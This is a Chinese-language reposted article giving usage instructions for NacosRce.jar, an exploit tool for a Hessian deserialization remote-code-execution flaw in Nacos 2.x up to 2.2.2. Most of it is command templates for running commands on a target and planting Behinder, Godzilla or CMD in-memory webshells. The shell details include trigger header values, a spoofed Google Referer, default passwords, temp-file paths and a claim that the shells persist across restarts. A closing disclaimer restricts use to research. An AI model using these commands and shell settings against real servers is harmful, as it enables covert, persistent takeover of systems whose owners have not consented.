开局先放一张图
使用方式
自动注入内存马并执行命令:
模板:
java -jar NacosRce.jar Url Jraft端口 "Command"
示例:
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 "whoami"
只注入内存马:
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell
冰蝎内存马
1、需要设置请求头x-client-data:rebeyond
2、设置Referer:https://www.google.com/
3、路径随意
4、密码rebeyond
哥斯拉内存马
1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key
CMD内存马
1、需要设置请求头x-client-data:cmd
2、设置Referer:https://www.google.com/
3、请求头cmd:要执行的命令
v0.5
版本实现了:
1、不出网漏洞利用
2、可多次发起漏洞利用
3、同时注入冰蝎/哥斯拉/CMD内存马
4、内存马对nacos多版本进行了兼容
tips:
1、请用jdk1.8
2、适用于 Nacos 2.x <= 2.2.2
3、非集群的也能打哦
4、此内存马重启nacos依然存活
关于Windows
如用下面的方式执行,注入内存马时会生成临时文件 C:WindowsTempnacos_data_temp
和 C:WindowsTempnacos_data_temp.class
文件
java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami" windows
如果没有在最后加 windows
,临时文件会在 /tmp/nacos_data_temp
/tmp/nacos_data_temp.class
,所以权限足够的话,不指定 windows
也能打成功
windows
没打成功也许是因为没权限操作 C盘
或其他原因
项目地址(欢迎Star,0.5版暂时需要自己编译):
https://github.com/c0olw/NacosRce
原文始发于微信公众号(刨洞安全团队):Nacos Hessian 反序列化漏洞利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论